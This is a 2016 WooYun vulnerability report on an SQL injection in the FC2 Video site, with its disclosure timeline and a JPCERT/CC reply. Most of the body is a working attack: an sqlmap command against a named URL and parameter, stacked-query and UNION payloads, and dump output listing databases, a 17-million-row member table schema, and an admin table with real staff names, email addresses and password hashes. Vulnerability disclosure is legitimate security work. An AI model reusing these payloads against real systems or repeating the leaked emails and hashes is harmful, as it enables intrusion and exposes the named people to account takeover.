当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186058

漏洞标题:日本fc2视频一处注入可union(1729万用户数据 电话\邮箱\密码)

相关厂商:日本fc2视频

漏洞作者: sauce

提交时间:2016-03-18 08:47

修复时间:2016-05-04 17:40

公开时间:2016-05-04 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经确认,细节仅向厂商公开
2016-03-30: 细节向核心白帽子及相关领域专家公开
2016-04-09: 细节向普通白帽子公开
2016-04-19: 细节向实习白帽子公开
2016-05-04: 细节向公众公开

简要描述:

成立于 1999 年的 FC2 是世界上最大的成人网站之一,业务以日语为主,公司总部位于美国内华达州的拉斯维加斯。
FC2 采用会员制度,视频上传者则能通过会员的点击得到回报,通过银行卡结算。抛开道德因素,这形成了一个极其健康的良性循环,因此使得 FC2 的片源极其丰富。另外,FC2 的视频直播同样包含成人内容,通过付费点击,来自世界各地的主播们也能得丰厚的金钱回报。影音资源除去成人内容,还包含大量盗版电影资源和视频,FC2 的视频点击率在日本排名第三,排在 YouTube 和 Niconico 之后。

详细说明:

QQ拼音截图未命名.png


新域名

python sqlmap.py -u "http://xiaojiadianvideo.asia/a/member.php?kobj_mb_id=82801549"


---
Parameter: kobj_mb_id (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: kobj_mb_id=82801549;(SELECT * FROM (SELECT(SLEEP(5)))AeEw)#
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: kobj_mb_id=82801549 UNION ALL SELECT NULL,NULL,CONCAT(0x7178787871,0x6f51765857554a76694572557a665553425468724f7041596d63667573594a6e48486571784e6771,0x7178766271)-- -
---
[08:07:13] [INFO] the back-end DBMS is MySQL
[08:07:13] [INFO] fetching banner
back-end DBMS: MySQL 5.0.11
banner:    '5.6.24-log'
[08:07:13] [INFO] fetching current user
current user:    'videofc2@**.**.**.**/**.**.**.**'
[08:07:13] [INFO] fetching current database
current database:    'videofc2'
[08:07:13] [INFO] fetching server hostname
hostname:    'dbreplica1006.video.fc2'
[08:07:13] [INFO] testing if current user is DBA
[08:07:13] [INFO] fetching current user
[08:07:13] [WARNING] reflective value(s) found and filtering out
[08:07:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[08:07:13] [INFO] fetching database users
[08:07:13] [INFO] the SQL query used returns 1 entries
[08:07:13] [INFO] resumed: 'videofc2'@'**.**.**.**/**.**.**.**'
database management system users [1]:
[*] 'videofc2'@'**.**.**.**/**.**.**.**'


+----------------------+----------------+
| Column | Type |
+----------------------+----------------+
| mb_add_at | binary(14) |
| mb_birth | binary(8) |
| mb_clap_flag | tinyint(1) |
| mb_description | blob |
| mb_edit_at | binary(14) |
| mb_exchange | tinyint(1) |
| mb_favorited_count | int(11) |
| mb_fc2id | int(11) |
| mb_from_service_type | varbinary(1) |
| mb_id | int(11) |
| mb_is_adult | binary(1) |
| mb_is_melmaga | binary(1) |
| mb_is_message_mailto | binary(1) |
| mb_isdel | binary(1) |
| mb_kari_mobile_mail | varbinary(250) |
| mb_language | varbinary(5) |
| mb_lastlogin | binary(14) |
| mb_loginpwd | varbinary(64) |
| mb_lv_bantime | int(11) |
| mb_lv_kickcount | varbinary(4) |
| mb_mail | varbinary(250) |
| mb_mobile_mail | varbinary(250) |
| mb_name | varbinary(64) |
| mb_pict | varbinary(250) |
| mb_pict_icon | varbinary(250) |
| mb_sex | binary(1) |
| mb_status | tinyint(1) |
| mb_tag | blob |
| mb_upcontent_count | int(11) |
+----------------------+----------------+
Database: videofc2
+----------+---------+
| Table | Entries |
+----------+---------+
| d_member | 17290940 |
+----------+---------+
</code>

漏洞证明:

available databases [3]:
[*] information_schema
[*] videofc2
[*] videofc2_non_replicated


可看到管理员帐号

Database: videofc2
Table: sa_users
[20 entries]
+-----+---------------------+---------------------------------+----------+---------------------+---------------------+-------------------------------------------------+
| id  | name                | email                           | is_admin | created_at          | updated_at          | hashed_password                                 |
+-----+---------------------+---------------------------------+----------+---------------------+---------------------+-------------------------------------------------+
| 87  | takenaka            | takenaka.hitoshi@hpsys.co.jp    | 0        | 2013-05-01,02:53:08 | 2015-06-25,14:30:51 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 88  | eguadian            | e-guardian@fc2.co.jp            | 0        | 2011-11-16,09:51:30 | <blank>             | 806c315db059dc2e90a0383e04141d24f7c684dc        |
| 90  | eguardian2          | e-guardian2@fc2.co.jp           | 0        | 2011-11-18,15:33:11 | <blank>             | bb1106a74a40edb0da3ad494f74c44fa28f68964        |
| 99  | testokamoto         | takuya.okamoto@fc2.co.jp        | 0        | 2013-05-01,03:47:16 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 102 | tochi               | tochi.noriyoshi@hpsys.co.jp     | 0        | 2014-06-05,08:33:49 | 2015-06-25,14:30:59 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 104 | infra_team          | nt@hpsys.co.jp                  | 1        | 2014-09-17,04:48:31 | 2015-07-06,15:00:48 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 105 | contents-check      | contents-check@fc2.us           | 1        | 2014-10-17,02:30:18 | 2014-10-17,02:30:29 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 111 | cs05                | fc2.cs05@**.**.**.**              | 1        | 2015-04-14,09:38:26 | 2015-04-14,09:39:36 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 118 | trevor_basic        | trevor+basic@**.**.**.** | 0        | 2015-05-20,09:23:55 | <blank>             | da8aa682af9e58711b8766ea237d293472efd13e        |
| 119 | takenaka-test       | takenaka.hitoshi+1@hpsys.co.jp  | 0        | 2015-06-01,01:47:40 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
| 120 | 2015-06-25,14:35:57 | dev01@fc2.us                    | 1        | 2015-06-25,14:25:48 | <blank>             | 1f86f8cafa3734beeb0732466bffdf50fe2814f6        |
| 121 | cs02                | cs02@fc2.us                     | 1        | 2015-06-25,14:39:59 | 2015-10-01,09:34:32 | d5d6c6812b086aec7d24f21b114f327f1ba35aa7        |
| 122 | cs02A               | cs02+a@fc2.us                   | 1        | 2015-06-25,14:46:11 | 2015-07-06,16:45:24 | a6ef63d25d403a8bb5a62268359078057a8e24f0        |
| 125 | 2015-07-07,08:18:11 | fc2aa@fc2.us                    | 1        | 2015-07-07,08:18:04 | <blank>             | de9b57e2e11a380479c187545df08152284fa52a        |
| 126 | <blank>             | cs03@fc2.us                     | 0        | 2015-09-10,08:12:38 | <blank>             | e40b061c0384f38729bdd2973e3c7bdc9cad368f        |
| 127 | <blank>             | fc2.cs03@**.**.**.**              | 0        | 2015-09-10,08:13:08 | <blank>             | 2e64944d48b58db3875fa8532285707d89c7c573        |
| 128 | aldo                | aldo@**.**.**.**         | 0        | 2015-10-01,08:58:51 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
| 129 | aldo                | aldo+00@**.**.**.**      | 0        | 2015-10-01,09:19:41 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
| 130 | cs05                | cs05@fc2.us                     | 0        | 2015-10-01,10:08:36 | <blank>             | 3b5eec56306e7b45ed75844fc3add7abca91789d        |
| 131 | fc2.cs02+02         | fc2.cs02+02@**.**.**.**           | 0        | 2015-10-01,15:34:23 | <blank>             | 08f909d57fc27d0110791db7a17c9dfd904f9600        |


第一个库

Database: videofc2
[226 tables]
+-------------------------------------+
| Tracker_Summary                     |
| Tracker_Summary_contents_holder     |
| d_admin_abuse_auto_freezing_address |
| d_admin_operation_contact_name      |
| d_admin_operation_log               |
| d_admin_operation_type              |
| d_advertise_deploy                  |
| d_advertise_select                  |
| d_affiliate4cn                      |
| d_affiliate4cn_summary              |
| d_amazon_advertise                  |
| d_amazon_advertise_category_ref     |
| d_amazon_advertise_queue            |
| d_amazon_advertise_ref              |
| d_android_report                    |
| d_app_genres                        |
| d_auth_content                      |
| d_aws_database                      |
| d_bat_access_origin                 |
| d_black_words                       |
| d_cancellation_reason               |
| d_channel_group                     |
| d_channel_info                      |
| d_channel_layer                     |
| d_channel_video                     |
| d_channel_video_ref                 |
| d_contents_holder                   |
| d_contents_holder_get_member        |
| d_contents_holder_owner             |
| d_convert_fake_mp4                  |
| d_crontab_setting                   |
| d_daily_popular                     |
| d_deploy_setting                    |
| d_dispersion_archive_servers        |
| d_dispersion_charge_servers         |
| d_dispersion_servers                |
| d_dmca_input_data                   |
| d_dmca_mail_auth                    |
| d_dmca_monthly_summarized_data      |
| d_dmca_reliable_right_holder        |
| d_dmca_strike_log                   |
| d_dmca_strike_summary               |
| d_downloadcnt_android               |
| d_encode_from_s3                    |
| d_exclusion_ranking                 |
| d_fc2id_for_veoh_members            |
| d_feature_content                   |
| d_feature_content_list              |
| d_file_copy_log                     |
| d_file_copy_status                  |
| d_guest                             |
| d_guest_spam                        |
| d_himawari_group_id                 |
| d_inapp_purchase_transactions       |
| d_insert_key_frame                  |
| d_inspected_review                  |
| d_inspection_words                  |
| d_ios_review                        |
| d_ios_review_num                    |
| d_keyword                           |
| d_keyword_total                     |
| d_member                            |
| d_member_adult_blackwords_unprint   |
| d_member_backup                     |
| d_member_content_ban                |
| d_member_custom_profile             |
| d_member_deleted                    |
| d_member_duplicatedid               |
| d_member_duplicatedid2              |
| d_member_favofriend                 |
| d_member_favofriend_link            |
| d_member_for_veoh_test              |
| d_member_friend                     |
| d_member_friendinfo                 |
| d_member_login_count                |
| d_member_mess                       |
| d_member_plist                      |
| d_member_plist_fine                 |
| d_member_send                       |
| d_member_spam                       |
| d_member_trophy                     |
| d_movies_on_cacheserver8            |
| d_movies_transfer8                  |
| d_mykeyword                         |
| d_payment_user                      |
| d_payment_user_backup               |
| d_payment_user_lang_summary         |
| d_payment_user_summary              |
| d_paypal_log                        |
| d_permit_cdn                        |
| d_player_report                     |
| d_prohibited_users                  |
| d_prohibited_words                  |
| d_push_devicetoken                  |
| d_rank_ONE                          |
| d_rank_ONE_lang                     |
| d_rank_purchase                     |
| d_rankcount                         |
| d_recent_view_content               |
| d_research                          |
| d_review                            |
| d_review_blackword_unprint          |
| d_review_sjis                       |
| d_review_spam                       |
| d_reward_transactions               |
| d_saymove_comeid                    |
| d_sell_channel_image                |
| d_sell_video_image                  |
| d_sell_video_value                  |
| d_sell_video_value_ref              |
| d_server_info                       |
| d_snap_evaluate                     |
| d_snap_evalute_once                 |
| d_snap_evalute_per_upid             |
| d_snap_evalute_per_user             |
| d_snap_ranking_transactions         |
| d_snap_week_counter                 |
| d_snap_weekscore                    |
| d_snapvideo_favocount               |
| d_sns_counter                       |
| d_support_memo                      |
| d_support_memo_tmp                  |
| d_tag                               |
| d_tag_blackword_unprint             |
| d_tag_relation                      |
| d_transaction_log                   |
| d_upcontent                         |
| d_upcontent_backup                  |
| d_upcontent_blackword_unprint       |
| d_upcontent_cat                     |
| d_upcontent_cat_num                 |
| d_upcontent_contest                 |
| d_upcontent_inspected               |
| d_upcontent_keyword                 |
| d_upcontent_keyword_request         |
| d_upcontent_live_score              |
| d_upcontent_playtime                |
| d_upcontent_purchase                |
| d_upcontent_purchase_canceled       |
| d_upcontent_reaction                |
| d_upcontent_sell                    |
| d_upcontent_sjis                    |
| d_upcontent_sort                    |
| d_upcontent_statistics              |
| d_upcontent_stop_video              |
| d_upcontent_veoh                    |
| d_upcontent_veoh2                   |
| d_upcontent_videoinfo               |
| d_upload_block_ip                   |
| d_upload_info                       |
| d_upload_spam_info                  |
| d_upload_spam_user                  |
| d_uuid_linked_guest                 |
| d_veoh_member_map                   |
| d_video_pack                        |
| d_video_pack_contents               |
| d_video_pack_funds                  |
| d_video_pack_member                 |
| d_video_pack_plan                   |
| d_video_pack_plan_history           |
| d_view_history                      |
| d_view_history_detail               |
| d_viewcount                         |
| d_viewcount_bk2_bk                  |
| d_viewcount_per_cat                 |
| d_violation                         |
| d_violation_detail                  |
| d_vote                              |
| download_log                        |
| download_purchase                   |
| download_seller                     |
| frozen_author                       |
| frozen_author_entrust               |
| frozen_movie                        |
| frozen_movie_reserve                |
| frozen_movie_reserve_history        |
| g_as_count                          |
| g_as_count_old                      |
| g_media_pv                          |
| g_pv                                |
| iGIFan                              |
| m_mcat                              |
| m_mcat_backup                       |
| movieT                              |
| q_conv_flv                          |
| q_conv_flv_pri                      |
| q_conv_test                         |
| q_convert                           |
| q_convertedfile2deploy              |
| q_delete                            |
| q_file_create                       |
| q_file_create_backup                |
| q_flvh264                           |
| q_frozen                            |
| q_movie_info_inspection4china       |
| q_other_trans                       |
| q_purge_cdn                         |
| q_range_of_video_pri                |
| q_seize_points_for_contents         |
| q_seize_points_for_members          |
| q_solr_search                       |
| q_suggest                           |
| q_tweet_list                        |
| q_upload                            |
| s_auto_payment_log                  |
| s_free_user_log                     |
| s_jobserver                         |
| s_login_count                       |
| s_payment_user_daily_count          |
| s_payment_user_log                  |
| s_plist                             |
| s_transaction_log                   |
| s_upcontent                         |
| s_video_pack_transaction_log        |
| sa_fc2video_video_checks            |
| sa_users                            |
| seized_points_log_for_contents      |
| seized_points_log_for_members       |
| test_view_history                   |
| tracker                             |
| upcontent_view_count                |
| upload_owner2                       |
| upload_watch                        |
| upload_watch2                       |
| wifi_campaign_user                  |
| xpremium_delete_log                 |
+-------------------------------------+


第二个库

back-end DBMS: MySQL 5.0.11
Database: videofc2_non_replicated
[62 tables]
+----------------------------------+
| _d_delivery_info                 |
| _d_delivery_info_memo            |
| _d_delivery_propose              |
| d_audible_magic_count            |
| d_audible_magic_log              |
| d_auto_reconversion_settings     |
| d_cancellation_log               |
| d_cancellation_statistics        |
| d_content_not_found              |
| d_convert_status                 |
| d_count_ginfo_access             |
| d_delivery_freemp4_error         |
| d_disk_free                      |
| d_download_count                 |
| d_download_count_1               |
| d_download_count_2               |
| d_download_mobile_count          |
| d_download_mobile_count_1        |
| d_download_mobile_count_2        |
| d_download_payment_count_1       |
| d_download_payment_count_2       |
| d_email_booking                  |
| d_email_booking_detail           |
| d_file_transfer_count            |
| d_move_movies                    |
| d_move_original_files            |
| d_movies_kddi_cacheserver        |
| d_movies_kddi_cacheserver_mobile |
| d_movies_kddi_cacheserver_test   |
| d_movies_on_cacheserver          |
| d_movies_transfer                |
| d_movies_transfer_mobile         |
| d_multiaccess                    |
| d_multiaccess_payment            |
| d_path_change                    |
| d_payment_click                  |
| d_payment_click_count            |
| d_reconversion_que               |
| d_service_status                 |
| d_slow_ns_disp_user              |
| d_slow_ns_ips                    |
| d_spam_download                  |
| d_spam_download_payment          |
| d_spam_ip                        |
| d_spam_ip2host                   |
| d_spam_log                       |
| d_spam_pattern                   |
| d_spam_review_log                |
| d_spam_vote_log                  |
| d_total_payment_users            |
| d_traffic                        |
| d_traffic_free_mp4               |
| d_traffic_payment                |
| g_pv_test                        |
| q_delete_freemp4                 |
| q_purge_cdn_list                 |
| q_suggest                        |
| q_video_record                   |
| s_analysis_member_action         |
| s_link_ip_to_domainname          |
| s_video_access_log               |
| s_video_access_log_isp_summary   |
+----------------------------------+

修复方案:

版权声明:转载请注明来源 sauce@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-03-20 17:40

厂商回复:

最新状态:

2016-03-20:Hello sauce.This is JPCERT/CC.Thank you for your information.We will notify this information to the site administrator.